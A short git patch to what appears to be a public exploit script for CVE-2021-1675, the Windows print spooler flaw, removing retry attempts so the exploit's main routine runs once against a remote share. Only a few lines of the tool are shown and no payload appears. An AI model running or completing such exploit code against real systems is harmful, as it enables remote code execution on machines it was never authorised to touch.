From 74030a63c1b2dbed1868b362ae6d43f2060487cc Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 09:59:13 +0200 Subject: [PATCH] Remove tries --- CVE-2021-1675.py | 7 ------- 1 file changed, 7 deletions(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 1525298..e850c6d 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -166,11 +166,4 @@ Example; print("[+] pDriverPath Found {0}".format(pDriverPath)) print("[*] Executing {0}".format(options.share)) - - #re-run if stage0/stageX fails - print("[*] Try 1...") main(dce, pDriverPath, options.share) - print("[*] Try 2...") - main(dce, pDriverPath,options.share) - print("[*] Try 3...") - main(dce, pDriverPath,options.share)